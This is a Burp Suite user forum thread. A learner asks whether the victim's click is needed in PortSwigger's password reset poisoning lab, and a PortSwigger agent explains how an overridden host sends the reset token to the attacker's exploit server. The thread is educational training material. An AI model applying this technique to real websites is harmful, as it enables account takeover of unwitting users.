Burp Suite User Forum

Login to post

Basic password reset poisoning querry

Nowicjusz | Last updated: Aug 26, 2021 01:14PM UTC

i am wondering if the lab description is misleading : "The user carlos will carelessly click on any links in emails that he receives." Do we, theoretically, need any interaction from the affected user? Because the forged request generates the token for the password reset and the server response containing it is sent to attacker controlled 'exploit server' and logged. it seems for me that we dont need carlos here. Next, we simply edit url with the generated token and use it to reset carlos password. There was no follow up email to confirm if this was intended action to reset the password as well. Cheers

Michelle, PortSwigger Agent | Last updated: Aug 27, 2021 12:59PM UTC

Thanks for your message Carlos does play a part in this lab. When you set the username to Carlos, it sends the reset email to his registered email address. Normally, when you click the reset link, it sends a GET /forgot-password?temp-forgot-password-token=<reset-token> request to the actual website, which looks at the token, and uses it to determine whose password is being reset. Because we’ve overridden the host in the URL, this request instead goes to our exploit server, so we can see the token in the access log. The bit where we need Carlos though is that this request would never get sent unless he clicked on the link. I hope this helps to answer your query. Good luck with the labs!

You need to Log in to post a reply. Or register here, for free.